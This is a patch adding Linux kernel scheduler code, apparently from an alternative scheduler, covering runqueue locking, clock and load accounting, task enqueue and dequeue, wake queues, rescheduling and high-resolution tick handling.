++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
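++/*
++ * Typical usage of the task access lock helpers (see e.g.
++ * wait_task_inactive() below):
++ *
++ *	raw_spinlock_t *lock;
++ *	unsigned long flags;
++ *	struct rq *rq = task_access_lock_irqsave(p, &lock, &flags);
++ *	... inspect or modify p's scheduling state ...
++ *	task_access_unlock_irqrestore(p, lock, &flags);
++ */
++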
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compiler should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight misattribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
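++/*
++ * A sketch of the arithmetic, assuming rq->clock counts nanoseconds:
++ * each history bit covers a 2^17 ns (~131us) block, so the 32-bit
++ * load_history spans roughly 4.2ms.  RQ_LOAD_HISTORY_TO_UTIL() extracts
++ * the eight bits just below the current-block bit, which rq_load_util()
++ * scales by max >> RQ_UTIL_SHIFT, yielding a utilization value in
++ * [0, max * 255 / 256].
++ */
++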
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, let's send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	sched_info_dequeue(rq, p);						\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
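++/*
++ * These macros keep rq->queue.bitmap in sync with the per-priority
++ * lists: a bit stays set while its list is non-empty and is cleared when
++ * the last task leaves, so sched_rq_first_task() only needs a single
++ * find_first_bit().
++ */
++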
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task residing on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task residing on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task residing on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
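++/*
++ * Note that fetch_or() returns the value *before* the OR, which lets
++ * set_nr_and_not_polling() below set _TIF_NEED_RESCHED and observe
++ * whether _TIF_POLLING_NRFLAG was already set in a single atomic
++ * operation.
++ */
++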
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending on whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do a similar optimization for a completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
++ * (as that CPU's timer base may not be up to date wrt jiffies etc).
++ */
++int get_nohz_timer_target(void)
++{
++	int i, cpu = smp_processor_id(), default_cpu = -1;
++	struct cpumask *mask;
++	const struct cpumask *hk_mask;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
++		if (!idle_cpu(cpu))
++			return cpu;
++		default_cpu = cpu;
++	}
++
++	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
++
++	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
++		for_each_cpu_and(i, mask, hk_mask)
++			if (!idle_cpu(i))
++				return i;
++
++	if (default_cpu == -1)
++		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
++	cpu = default_cpu;
++
++	return cpu;
++}
++
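++/*
++ * Note: the loop above walks this CPU's topology masks outward from the
++ * closest level, so the busy housekeeping CPU it returns is, by that
++ * mask ordering, as topologically close to the caller as possible.
++ */
++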
++/*
++ * When add_timer_on() enqueues a timer into the timer wheel of an
++ * idle CPU then this timer might expire before the next timer event
++ * which is scheduled to wake up that CPU. In case of a completely
++ * idle system the next event might even be infinite time into the
++ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
++ * leaves the inner idle loop so the newly added timer is taken into
++ * account when the CPU goes back to idle and evaluates the timer
++ * wheel for the next timer event.
++ */
++static inline void wake_up_idle_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (cpu == smp_processor_id())
++		return;
++
++	if (set_nr_and_not_polling(rq->idle))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++static inline bool wake_up_full_nohz_cpu(int cpu)
++{
++	/*
++	 * We just need the target to call irq_exit() and re-evaluate
++	 * the next tick. The nohz full kick at least implies that.
++	 * If needed we can still optimize that later with an
++	 * empty IRQ.
++	 */
++	if (cpu_is_offline(cpu))
++		return true;  /* Don't try to wake offline CPUs. */
++	if (tick_nohz_full_cpu(cpu)) {
++		if (cpu != smp_processor_id() ||
++		    tick_nohz_tick_stopped())
++			tick_nohz_full_kick_cpu(cpu);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/*
++	 * The alternative scheduler framework doesn't support sched_feat yet:
++	if (!sched_feat(HRTICK))
++		return 0;
++	*/
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns, that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
